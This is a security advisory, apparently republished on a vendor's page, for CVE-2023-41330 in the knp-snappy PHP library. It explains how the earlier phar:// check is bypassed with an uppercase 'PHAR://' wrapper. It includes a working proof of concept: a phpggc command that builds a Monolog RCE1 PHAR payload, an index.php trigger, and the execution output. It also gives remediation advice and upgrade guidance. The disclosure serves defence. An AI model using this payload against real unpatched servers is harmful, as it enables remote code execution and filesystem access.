Summary
Snappy PHAR deserialization vulnerability
Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the phar:// wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the phar:// string, it can be bypassed to achieve remote code execution again using a different case.
As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the phar:// wrapper.
Technical details
Description
The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.
If the user is able to control the second parameter of the generateFromHtml() function of Snappy, it will then be passed as the $filename parameter in the prepareOutput() function. In the original vulnerability, a file name with a phar:// wrapper could be sent to the fileExists() function, equivalent to the file_exists() PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.
To fix this issue, the string is now passed to the strpos() function and if it starts with phar://, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using PHAR:// instead of phar://.
Proof of Concept
To illustrate the vulnerability, the /tmp/exploit file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the -f option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.
$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar
The following index.php file will be used to trigger the vulnerability via the payload PHAR://exploit.phar.
<?php
// index.php
// include autoloader
require __DIR__ . '/vendor/autoload.php';
// reference the snappy namespace
use Knp\Snappy\Pdf;
$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
$snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');
Finally once executed, the /tmp/exploit file is successfully created on the filesystem.
$ php index.php
Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634
Stack trace:
#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)
#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)
#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)
#3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar')
#4 {main}
thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634
$ ls -l /tmp/exploit
-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit
This proof of concept is based on the original one published with CVE-2023-28115.
Workarounds
Control user data submitted to the function AbstractGenerator->generate(...)
References
https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
Credits
Rémi Matasse of Synacktiv (https://synacktiv.com/).
Impact
A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.
Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.
CVE-2023-41330 has a CVSS score of 9.8 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.4.3); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers http://, https:// or file:// be available on the function generateFromHtml().
Frequently Asked Questions
- What is CVE-2023-41330? CVE-2023-41330 is a critical-severity insecure deserialization vulnerability in knplabs/knp-snappy (composer), affecting versions <= 1.4.2. It is fixed in 1.4.3. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
- How severe is CVE-2023-41330? CVE-2023-41330 has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of knplabs/knp-snappy are affected by CVE-2023-41330? knplabs/knp-snappy (composer) versions <= 1.4.2 is affected.
- Is there a fix for CVE-2023-41330? Yes. CVE-2023-41330 is fixed in 1.4.3. Upgrade to this version or later.
- Is CVE-2023-41330 exploitable, and should I be worried? Whether CVE-2023-41330 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2023-41330 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2023-41330? Upgrade
knplabs/knp-snappyto 1.4.3 or later.